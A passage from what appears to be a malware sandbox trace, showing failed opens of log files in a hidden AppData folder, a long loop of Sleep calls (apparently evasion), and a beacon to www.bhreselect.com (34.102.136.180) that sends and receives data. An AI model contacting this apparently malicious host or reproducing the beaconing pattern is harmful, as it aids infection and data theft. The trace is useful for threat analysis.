ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89890) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89da0) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.226] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.226] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0212.226] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a460) returned 1 [0212.226] Sleep (dwMilliseconds=0x7d0) [0212.227] Sleep (dwMilliseconds=0x7d0) [0212.229] Sleep (dwMilliseconds=0x7d0) [0212.231] Sleep (dwMilliseconds=0x7d0) [0212.233] Sleep (dwMilliseconds=0x7d0) [0212.234] Sleep (dwMilliseconds=0x7d0) [0212.236] Sleep (dwMilliseconds=0x7d0) [0212.237] Sleep (dwMilliseconds=0x7d0) [0212.239] Sleep (dwMilliseconds=0x7d0) [0212.241] Sleep (dwMilliseconds=0x7d0) [0212.243] Sleep (dwMilliseconds=0x7d0) [0212.244] Sleep (dwMilliseconds=0x7d0) [0212.246] Sleep (dwMilliseconds=0x7d0) [0212.247] Sleep (dwMilliseconds=0x7d0) [0212.249] Sleep (dwMilliseconds=0x7d0) [0212.250] Sleep (dwMilliseconds=0x7d0) [0212.252] Sleep (dwMilliseconds=0x7d0) [0212.253] Sleep (dwMilliseconds=0x7d0) [0212.255] Sleep (dwMilliseconds=0x7d0) [0212.256] Sleep (dwMilliseconds=0x7d0) [0212.258] Sleep (dwMilliseconds=0x7d0) [0212.259] Sleep (dwMilliseconds=0x7d0) [0212.261] Sleep (dwMilliseconds=0x7d0) [0212.263] Sleep (dwMilliseconds=0x7d0) [0212.265] Sleep (dwMilliseconds=0x7d0) [0212.266] Sleep (dwMilliseconds=0x7d0) [0212.269] Sleep (dwMilliseconds=0x7d0) [0212.270] Sleep (dwMilliseconds=0x7d0) [0212.272] Sleep (dwMilliseconds=0x7d0) [0212.274] Sleep (dwMilliseconds=0x7d0) [0212.276] Sleep (dwMilliseconds=0x7d0) [0212.278] Sleep (dwMilliseconds=0x7d0) [0212.279] Sleep (dwMilliseconds=0x7d0) [0212.281] Sleep (dwMilliseconds=0x7d0) [0212.282] Sleep (dwMilliseconds=0x7d0) [0212.284] Sleep (dwMilliseconds=0x7d0) [0212.293] Sleep (dwMilliseconds=0x7d0) [0212.294] Sleep (dwMilliseconds=0x7d0) [0212.296] Sleep (dwMilliseconds=0x7d0) [0212.297] Sleep (dwMilliseconds=0x7d0) [0212.299] Sleep (dwMilliseconds=0x7d0) [0212.300] Sleep (dwMilliseconds=0x7d0) [0212.302] Sleep (dwMilliseconds=0x7d0) [0212.303] Sleep (dwMilliseconds=0x7d0) [0212.305] Sleep (dwMilliseconds=0x7d0) [0212.308] Sleep (dwMilliseconds=0x7d0) [0212.310] Sleep (dwMilliseconds=0x7d0) [0212.311] Sleep (dwMilliseconds=0x7d0) [0212.313] Sleep (dwMilliseconds=0x7d0) [0212.314] Sleep (dwMilliseconds=0x7d0) [0212.316] Sleep (dwMilliseconds=0x7d0) [0212.319] Sleep (dwMilliseconds=0x7d0) [0212.320] Sleep (dwMilliseconds=0x7d0) [0212.322] Sleep (dwMilliseconds=0x7d0) [0212.323] Sleep (dwMilliseconds=0x7d0) [0212.325] Sleep (dwMilliseconds=0x7d0) [0212.326] Sleep (dwMilliseconds=0x7d0) [0212.328] Sleep (dwMilliseconds=0x7d0) [0212.329] Sleep (dwMilliseconds=0x7d0) [0212.331] Sleep (dwMilliseconds=0x7d0) [0212.332] Sleep (dwMilliseconds=0x7d0) [0212.336] Sleep (dwMilliseconds=0x7d0) [0212.337] Sleep (dwMilliseconds=0x7d0) [0212.339] Sleep (dwMilliseconds=0x7d0) [0212.341] Sleep (dwMilliseconds=0x7d0) [0212.342] Sleep (dwMilliseconds=0x7d0) [0212.344] Sleep (dwMilliseconds=0x7d0) [0212.349] Sleep (dwMilliseconds=0x7d0) [0212.351] Sleep (dwMilliseconds=0x7d0) [0212.353] Sleep (dwMilliseconds=0x7d0) [0212.354] Sleep (dwMilliseconds=0x7d0) [0212.356] Sleep (dwMilliseconds=0x7d0) [0212.357] Sleep (dwMilliseconds=0x7d0) [0212.359] Sleep (dwMilliseconds=0x7d0) [0212.360] Sleep (dwMilliseconds=0x7d0) [0212.362] Sleep (dwMilliseconds=0x7d0) [0212.364] Sleep (dwMilliseconds=0x7d0) [0212.406] Sleep (dwMilliseconds=0x7d0) [0212.407] Sleep (dwMilliseconds=0x7d0) [0212.409] Sleep (dwMilliseconds=0x7d0) [0212.410] Sleep (dwMilliseconds=0x7d0) [0212.412] Sleep (dwMilliseconds=0x7d0) [0212.413] Sleep (dwMilliseconds=0x7d0) [0212.415] Sleep (dwMilliseconds=0x7d0) [0212.416] Sleep (dwMilliseconds=0x7d0) [0212.418] Sleep (dwMilliseconds=0x7d0) [0212.419] Sleep (dwMilliseconds=0x7d0) [0212.421] Sleep (dwMilliseconds=0x7d0) [0212.422] Sleep (dwMilliseconds=0x7d0) [0212.424] Sleep (dwMilliseconds=0x7d0) [0212.425] Sleep (dwMilliseconds=0x7d0) [0212.427] Sleep (dwMilliseconds=0x7d0) [0212.430] Sleep (dwMilliseconds=0x7d0) [0212.433] Sleep (dwMilliseconds=0x7d0) [0212.434] Sleep (dwMilliseconds=0x7d0) [0212.436] Sleep (dwMilliseconds=0x7d0) [0212.437] Sleep (dwMilliseconds=0x7d0) [0212.440] Sleep (dwMilliseconds=0x7d0) [0212.442] Sleep (dwMilliseconds=0x7d0) [0212.444] Sleep (dwMilliseconds=0x7d0) [0212.453] Sleep (dwMilliseconds=0x7d0) [0212.455] Sleep (dwMilliseconds=0x7d0) [0212.457] Sleep (dwMilliseconds=0x7d0) [0212.458] Sleep (dwMilliseconds=0x7d0) [0212.460] Sleep (dwMilliseconds=0x7d0) [0212.461] Sleep (dwMilliseconds=0x7d0) [0212.463] Sleep (dwMilliseconds=0x7d0) [0212.464] Sleep (dwMilliseconds=0x7d0) [0212.466] Sleep (dwMilliseconds=0x7d0) [0212.467] Sleep (dwMilliseconds=0x7d0) [0212.469] Sleep (dwMilliseconds=0x7d0) [0212.470] Sleep (dwMilliseconds=0x7d0) [0212.472] Sleep (dwMilliseconds=0x7d0) [0212.477] Sleep (dwMilliseconds=0x7d0) [0212.478] Sleep (dwMilliseconds=0x7d0) [0212.480] Sleep (dwMilliseconds=0x7d0) [0212.481] Sleep (dwMilliseconds=0x7d0) [0212.483] Sleep (dwMilliseconds=0x7d0) [0212.485] Sleep (dwMilliseconds=0x7d0) [0212.487] Sleep (dwMilliseconds=0x7d0) [0212.489] Sleep (dwMilliseconds=0x7d0) [0212.491] Sleep (dwMilliseconds=0x7d0) [0212.492] Sleep (dwMilliseconds=0x7d0) [0212.494] Sleep (dwMilliseconds=0x7d0) [0212.495] Sleep (dwMilliseconds=0x7d0) [0212.497] Sleep (dwMilliseconds=0x7d0) [0212.498] Sleep (dwMilliseconds=0x7d0) [0212.500] Sleep (dwMilliseconds=0x7d0) [0212.501] Sleep (dwMilliseconds=0x7d0) [0212.503] Sleep (dwMilliseconds=0x7d0) [0212.504] Sleep (dwMilliseconds=0x7d0) [0212.507] Sleep (dwMilliseconds=0x7d0) [0212.510] Sleep (dwMilliseconds=0x7d0) [0212.511] Sleep (dwMilliseconds=0x7d0) [0212.513] Sleep (dwMilliseconds=0x7d0) [0212.514] Sleep (dwMilliseconds=0x7d0) [0212.516] Sleep (dwMilliseconds=0x7d0) [0212.518] Sleep (dwMilliseconds=0x7d0) [0212.520] Sleep (dwMilliseconds=0x7d0) [0212.522] Sleep (dwMilliseconds=0x7d0) [0212.523] Sleep (dwMilliseconds=0x7d0) [0212.525] Sleep (dwMilliseconds=0x7d0) [0212.526] Sleep (dwMilliseconds=0x7d0) [0212.528] Sleep (dwMilliseconds=0x7d0) [0212.531] Sleep (dwMilliseconds=0x7d0) [0212.532] Sleep (dwMilliseconds=0x7d0) [0212.534] Sleep (dwMilliseconds=0x7d0) [0212.535] Sleep (dwMilliseconds=0x7d0) [0212.537] Sleep (dwMilliseconds=0x7d0) [0212.538] Sleep (dwMilliseconds=0x7d0) [0212.540] Sleep (dwMilliseconds=0x7d0) [0212.541] Sleep (dwMilliseconds=0x7d0) [0212.543] Sleep (dwMilliseconds=0x7d0) [0212.544] Sleep (dwMilliseconds=0x7d0) [0212.546] Sleep (dwMilliseconds=0x7d0) [0212.547] Sleep (dwMilliseconds=0x7d0) [0212.549] Sleep (dwMilliseconds=0x7d0) [0212.552] Sleep (dwMilliseconds=0x7d0) [0212.553] Sleep (dwMilliseconds=0x7d0) [0212.555] Sleep (dwMilliseconds=0x7d0) [0212.556] Sleep (dwMilliseconds=0x7d0) [0212.558] Sleep (dwMilliseconds=0x7d0) [0212.560] Sleep (dwMilliseconds=0x7d0) [0212.596] Sleep (dwMilliseconds=0x7d0) [0212.597] Sleep (dwMilliseconds=0x7d0) [0212.599] Sleep (dwMilliseconds=0x7d0) [0212.600] Sleep (dwMilliseconds=0x7d0) [0212.602] Sleep (dwMilliseconds=0x7d0) [0212.604] Sleep (dwMilliseconds=0x7d0) [0212.607] Sleep (dwMilliseconds=0x7d0) [0212.608] Sleep (dwMilliseconds=0x7d0) [0212.610] Sleep (dwMilliseconds=0x7d0) [0212.611] Sleep (dwMilliseconds=0x7d0) [0212.613] Sleep (dwMilliseconds=0x7d0) [0212.614] Sleep (dwMilliseconds=0x7d0) [0212.617] Sleep (dwMilliseconds=0x7d0) [0212.619] Sleep (dwMilliseconds=0x7d0) [0212.620] Sleep (dwMilliseconds=0x7d0) [0212.622] Sleep (dwMilliseconds=0x7d0) [0212.623] Sleep (dwMilliseconds=0x7d0) [0212.625] Sleep (dwMilliseconds=0x7d0) [0212.626] Sleep (dwMilliseconds=0x7d0) [0212.628] Sleep (dwMilliseconds=0x7d0) [0212.629] Sleep (dwMilliseconds=0x7d0) [0212.632] Sleep (dwMilliseconds=0x7d0) [0212.634] Sleep (dwMilliseconds=0x7d0) [0212.641] Sleep (dwMilliseconds=0x7d0) [0212.644] Sleep (dwMilliseconds=0x7d0) [0212.645] Sleep (dwMilliseconds=0x7d0) [0212.647] Sleep (dwMilliseconds=0x7d0) [0212.649] Sleep (dwMilliseconds=0x7d0) [0212.651] Sleep (dwMilliseconds=0x7d0) [0212.652] Sleep (dwMilliseconds=0x7d0) [0212.654] Sleep (dwMilliseconds=0x7d0) [0212.655] Sleep (dwMilliseconds=0x7d0) [0212.657] Sleep (dwMilliseconds=0x7d0) [0212.658] Sleep (dwMilliseconds=0x7d0) [0212.660] Sleep (dwMilliseconds=0x7d0) [0212.661] Sleep (dwMilliseconds=0x7d0) [0212.663] Sleep (dwMilliseconds=0x7d0) [0212.664] Sleep (dwMilliseconds=0x7d0) [0212.666] Sleep (dwMilliseconds=0x7d0) [0212.667] Sleep (dwMilliseconds=0x7d0) [0212.669] Sleep (dwMilliseconds=0x7d0) [0212.672] Sleep (dwMilliseconds=0x7d0) [0212.673] Sleep (dwMilliseconds=0x7d0) [0212.675] Sleep (dwMilliseconds=0x7d0) [0212.676] Sleep (dwMilliseconds=0x7d0) [0212.678] Sleep (dwMilliseconds=0x7d0) [0212.679] Sleep (dwMilliseconds=0x7d0) [0212.683] Sleep (dwMilliseconds=0x7d0) [0212.684] Sleep (dwMilliseconds=0x7d0) [0212.685] Sleep (dwMilliseconds=0x7d0) [0212.687] Sleep (dwMilliseconds=0x7d0) [0212.688] Sleep (dwMilliseconds=0x7d0) [0212.691] Sleep (dwMilliseconds=0x7d0) [0212.693] Sleep (dwMilliseconds=0x7d0) [0212.695] Sleep (dwMilliseconds=0x7d0) [0212.696] Sleep (dwMilliseconds=0x7d0) [0212.698] Sleep (dwMilliseconds=0x7d0) [0212.699] Sleep (dwMilliseconds=0x7d0) [0212.701] Sleep (dwMilliseconds=0x7d0) [0212.702] Sleep (dwMilliseconds=0x7d0) [0212.704] Sleep (dwMilliseconds=0x7d0) [0212.705] Sleep (dwMilliseconds=0x7d0) [0212.707] Sleep (dwMilliseconds=0x7d0) [0212.708] Sleep (dwMilliseconds=0x7d0) [0212.710] Sleep (dwMilliseconds=0x7d0) [0212.711] Sleep (dwMilliseconds=0x7d0) [0212.713] Sleep (dwMilliseconds=0x7d0) [0212.716] Sleep (dwMilliseconds=0x7d0) [0212.718] Sleep (dwMilliseconds=0x7d0) [0212.719] Sleep (dwMilliseconds=0x7d0) [0212.721] Sleep (dwMilliseconds=0x7d0) [0212.722] Sleep (dwMilliseconds=0x7d0) [0212.727] Sleep (dwMilliseconds=0x7d0) [0212.728] Sleep (dwMilliseconds=0x7d0) [0212.730] Sleep (dwMilliseconds=0x7d0) [0212.731] Sleep (dwMilliseconds=0x7d0) [0212.749] Sleep (dwMilliseconds=0x7d0) [0212.751] Sleep (dwMilliseconds=0x7d0) [0212.752] Sleep (dwMilliseconds=0x7d0) [0212.754] Sleep (dwMilliseconds=0x7d0) [0212.756] Sleep (dwMilliseconds=0x7d0) [0212.757] Sleep (dwMilliseconds=0x7d0) [0212.762] Sleep (dwMilliseconds=0x7d0) [0212.763] Sleep (dwMilliseconds=0x7d0) [0212.765] Sleep (dwMilliseconds=0x7d0) [0212.766] Sleep (dwMilliseconds=0x7d0) [0212.768] Sleep (dwMilliseconds=0x7d0) [0212.773] Sleep (dwMilliseconds=0x7d0) [0212.774] Sleep (dwMilliseconds=0x7d0) [0212.776] Sleep (dwMilliseconds=0x7d0) [0212.777] Sleep (dwMilliseconds=0x7d0) [0212.779] Sleep (dwMilliseconds=0x7d0) [0212.783] Sleep (dwMilliseconds=0x7d0) [0212.784] Sleep (dwMilliseconds=0x7d0) [0212.786] Sleep (dwMilliseconds=0x7d0) [0212.788] Sleep (dwMilliseconds=0x7d0) [0212.789] Sleep (dwMilliseconds=0x7d0) [0212.792] Sleep (dwMilliseconds=0x7d0) [0212.793] Sleep (dwMilliseconds=0x7d0) [0212.795] Sleep (dwMilliseconds=0x7d0) [0212.798] Sleep (dwMilliseconds=0x7d0) [0212.800] Sleep (dwMilliseconds=0x7d0) [0212.801] Sleep (dwMilliseconds=0x7d0) [0212.805] Sleep (dwMilliseconds=0x7d0) [0212.807] Sleep (dwMilliseconds=0x7d0) [0212.809] Sleep (dwMilliseconds=0x7d0) [0212.810] Sleep (dwMilliseconds=0x7d0) [0212.812] Sleep (dwMilliseconds=0x7d0) [0212.816] Sleep (dwMilliseconds=0x7d0) [0212.818] Sleep (dwMilliseconds=0x7d0) [0212.819] Sleep (dwMilliseconds=0x7d0) [0212.821] Sleep (dwMilliseconds=0x7d0) [0212.822] Sleep (dwMilliseconds=0x7d0) [0212.824] Sleep (dwMilliseconds=0x7d0) [0212.825] Sleep (dwMilliseconds=0x7d0) [0212.827] Sleep (dwMilliseconds=0x7d0) [0212.829] Sleep (dwMilliseconds=0x7d0) [0212.830] Sleep (dwMilliseconds=0x7d0) [0212.832] Sleep (dwMilliseconds=0x7d0) [0212.833] Sleep (dwMilliseconds=0x7d0) [0212.835] Sleep (dwMilliseconds=0x7d0) [0212.839] Sleep (dwMilliseconds=0x7d0) [0212.840] Sleep (dwMilliseconds=0x7d0) [0212.842] Sleep (dwMilliseconds=0x7d0) [0212.843] Sleep (dwMilliseconds=0x7d0) [0212.845] Sleep (dwMilliseconds=0x7d0) [0212.849] Sleep (dwMilliseconds=0x7d0) [0212.851] Sleep (dwMilliseconds=0x7d0) [0212.852] Sleep (dwMilliseconds=0x7d0) [0212.854] Sleep (dwMilliseconds=0x7d0) [0212.855] Sleep (dwMilliseconds=0x7d0) [0212.860] Sleep (dwMilliseconds=0x7d0) [0212.861] Sleep (dwMilliseconds=0x7d0) [0212.863] Sleep (dwMilliseconds=0x7d0) [0212.864] Sleep (dwMilliseconds=0x7d0) [0212.866] Sleep (dwMilliseconds=0x7d0) [0212.867] Sleep (dwMilliseconds=0x7d0) [0212.869] Sleep (dwMilliseconds=0x7d0) [0212.870] Sleep (dwMilliseconds=0x7d0) [0212.872] Sleep (dwMilliseconds=0x7d0) [0212.873] Sleep (dwMilliseconds=0x7d0) [0212.875] Sleep (dwMilliseconds=0x7d0) [0212.876] Sleep (dwMilliseconds=0x7d0) [0212.883] Sleep (dwMilliseconds=0x7d0) [0212.884] Sleep (dwMilliseconds=0x7d0) [0212.886] Sleep (dwMilliseconds=0x7d0) [0212.887] Sleep (dwMilliseconds=0x7d0) [0212.889] Sleep (dwMilliseconds=0x7d0) [0212.896] Sleep (dwMilliseconds=0x7d0) [0212.897] Sleep (dwMilliseconds=0x7d0) [0212.899] Sleep (dwMilliseconds=0x7d0) [0212.900] Sleep (dwMilliseconds=0x7d0) [0212.905] Sleep (dwMilliseconds=0x7d0) [0212.906] Sleep (dwMilliseconds=0x7d0) [0212.908] Sleep (dwMilliseconds=0x7d0) [0212.909] Sleep (dwMilliseconds=0x7d0) [0212.911] Sleep (dwMilliseconds=0x7d0) [0212.912] Sleep (dwMilliseconds=0x7d0) [0212.914] Sleep (dwMilliseconds=0x7d0) [0212.915] Sleep (dwMilliseconds=0x7d0) [0212.917] Sleep (dwMilliseconds=0x7d0) [0212.918] Sleep (dwMilliseconds=0x7d0) [0212.920] Sleep (dwMilliseconds=0x7d0) [0212.921] Sleep (dwMilliseconds=0x7d0) [0212.923] Sleep (dwMilliseconds=0x7d0) [0212.926] Sleep (dwMilliseconds=0x7d0) [0212.928] Sleep (dwMilliseconds=0x7d0) [0212.929] Sleep (dwMilliseconds=0x7d0) [0212.931] Sleep (dwMilliseconds=0x7d0) [0212.932] Sleep (dwMilliseconds=0x7d0) [0212.934] Sleep (dwMilliseconds=0x7d0) [0212.937] Sleep (dwMilliseconds=0x7d0) [0212.938] Sleep (dwMilliseconds=0x7d0) [0212.940] Sleep (dwMilliseconds=0x7d0) [0212.941] Sleep (dwMilliseconds=0x7d0) [0212.943] Sleep (dwMilliseconds=0x7d0) [0212.944] Sleep (dwMilliseconds=0x7d0) [0212.948] Sleep (dwMilliseconds=0x7d0) [0212.949] Sleep (dwMilliseconds=0x7d0) [0212.951] Sleep (dwMilliseconds=0x7d0) [0212.952] Sleep (dwMilliseconds=0x7d0) [0212.954] Sleep (dwMilliseconds=0x7d0) [0212.955] Sleep (dwMilliseconds=0x7d0) [0212.957] Sleep (dwMilliseconds=0x7d0) [0212.958] Sleep (dwMilliseconds=0x7d0) [0212.960] Sleep (dwMilliseconds=0x7d0) [0212.961] Sleep (dwMilliseconds=0x7d0) [0212.963] Sleep (dwMilliseconds=0x7d0) [0212.964] Sleep (dwMilliseconds=0x7d0) [0212.966] Sleep (dwMilliseconds=0x7d0) [0212.969] Sleep (dwMilliseconds=0x7d0) [0212.971] Sleep (dwMilliseconds=0x7d0) [0212.972] Sleep (dwMilliseconds=0x7d0) [0212.974] Sleep (dwMilliseconds=0x7d0) [0212.975] Sleep (dwMilliseconds=0x7d0) [0212.977] Sleep (dwMilliseconds=0x7d0) [0212.981] Sleep (dwMilliseconds=0x7d0) [0212.983] Sleep (dwMilliseconds=0x7d0) [0212.984] Sleep (dwMilliseconds=0x7d0) [0212.986] Sleep (dwMilliseconds=0x7d0) [0212.987] Sleep (dwMilliseconds=0x7d0) [0212.989] Sleep (dwMilliseconds=0x7d0) [0212.990] Sleep (dwMilliseconds=0x7d0) [0212.992] Sleep (dwMilliseconds=0x7d0) [0212.993] Sleep (dwMilliseconds=0x7d0) [0212.995] Sleep (dwMilliseconds=0x7d0) [0212.996] Sleep (dwMilliseconds=0x7d0) [0212.998] Sleep (dwMilliseconds=0x7d0) [0212.999] Sleep (dwMilliseconds=0x7d0) [0213.003] Sleep (dwMilliseconds=0x7d0) [0213.005] Sleep (dwMilliseconds=0x7d0) [0213.006] Sleep (dwMilliseconds=0x7d0) [0213.008] Sleep (dwMilliseconds=0x7d0) [0213.009] Sleep (dwMilliseconds=0x7d0) [0213.011] Sleep (dwMilliseconds=0x7d0) [0213.014] Sleep (dwMilliseconds=0x7d0) [0213.015] Sleep (dwMilliseconds=0x7d0) [0213.017] Sleep (dwMilliseconds=0x7d0) [0213.018] Sleep (dwMilliseconds=0x7d0) [0213.020] Sleep (dwMilliseconds=0x7d0) [0213.021] Sleep (dwMilliseconds=0x7d0) [0213.025] Sleep (dwMilliseconds=0x7d0) [0213.026] Sleep (dwMilliseconds=0x7d0) [0213.028] Sleep (dwMilliseconds=0x7d0) [0213.030] Sleep (dwMilliseconds=0x7d0) [0213.031] Sleep (dwMilliseconds=0x7d0) [0213.033] Sleep (dwMilliseconds=0x7d0) [0213.034] Sleep (dwMilliseconds=0x7d0) [0213.036] Sleep (dwMilliseconds=0x7d0) [0213.037] Sleep (dwMilliseconds=0x7d0) [0213.039] Sleep (dwMilliseconds=0x7d0) [0213.040] Sleep (dwMilliseconds=0x7d0) [0213.042] Sleep (dwMilliseconds=0x7d0) [0213.043] Sleep (dwMilliseconds=0x7d0) [0213.048] Sleep (dwMilliseconds=0x7d0) [0213.050] Sleep (dwMilliseconds=0x7d0) [0213.051] Sleep (dwMilliseconds=0x7d0) [0213.053] Sleep (dwMilliseconds=0x7d0) [0213.057] Sleep (dwMilliseconds=0x7d0) [0213.059] Sleep (dwMilliseconds=0x7d0) [0213.060] Sleep (dwMilliseconds=0x7d0) [0213.062] Sleep (dwMilliseconds=0x7d0) [0213.104] Sleep (dwMilliseconds=0x7d0) [0213.106] Sleep (dwMilliseconds=0x7d0) [0213.107] Sleep (dwMilliseconds=0x7d0) [0213.109] Sleep (dwMilliseconds=0x7d0) [0213.114] Sleep (dwMilliseconds=0x7d0) [0213.115] Sleep (dwMilliseconds=0x7d0) [0213.117] Sleep (dwMilliseconds=0x7d0) [0213.118] Sleep (dwMilliseconds=0x7d0) [0213.120] Sleep (dwMilliseconds=0x7d0) [0213.280] Sleep (dwMilliseconds=0x7d0) [0213.315] Sleep (dwMilliseconds=0x7d0) [0213.350] socket (af=2, type=1, protocol=6) returned 0x1b04 [0213.350] getaddrinfo (in: pNodeName="www.bhreselect.com", pServiceName="80", pHints=0x9e75d38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75d68 | out: ppResult=0x9e75d68*=0xa05e5d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92bb0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0213.356] connect (s=0x1b04, name=0x9f92bb0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0213.377] send (s=0x1b04, buf=0x82e10fa*, len=172, flags=0) returned 172 [0213.377] setsockopt (s=0x1b04, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0213.378] recv (in: s=0x1b04, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 477 [0213.603] closesocket (s=0x1b04) returned 0 [0213.603] Sleep (dwMilliseconds=0x7d0) [0213.605] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.605] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0213.606] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0213.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.606] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.606] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0213.606] RtlDosPathNameToNtPathName_U (in: 